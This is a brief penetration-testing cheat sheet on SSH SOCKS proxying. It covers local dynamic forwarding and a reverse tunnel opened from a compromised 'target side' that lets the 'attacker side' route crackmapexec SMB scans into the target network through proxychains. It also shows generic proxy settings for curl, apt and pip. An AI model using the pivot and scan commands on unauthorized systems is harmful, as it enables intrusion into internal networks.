SSH Socks Proxy

SSH comes with a SOCKS5 proxy feature

Local Port -> Distant -> Net

ssh -D 127.0.0.1:LOCALPORT usr@DISTANT

Distant Port -> Local -> Net

Use case: execute ssh command from target side, the port shows up on attacker side, then use proxychains to forward requests

# Target side
ssh -R 127.0.0.1:DISTANTPORT usr@DISTANT

# Attacker side
echo -e '[ProxyList]\nsocks5 127.0.0.1 8888'>/tmp/TARGET
proxychains -q -f /tmp/TARGET crackmapexec smb TARGET_NETWORK

Proxy Usage

# CURL
curl --socks5 HOST:PORT https://ip.offensive.run

# APT
apt-get -o Acquire::socks::proxy "socks5://HOST:PORT" update


# PROXYCHAINS4
#   Install :
#   $ apt-get install proxychains4
#   Then replace default "socks4 127.0.0.1 9050" with "socks5 HOST PORT" into /etc/proxychains4.conf
proxychains4 curl https://ip.offensive.run


# PIP
python3 -m pip --proxy socks5:HOST:PORT install --upgrade aiohttp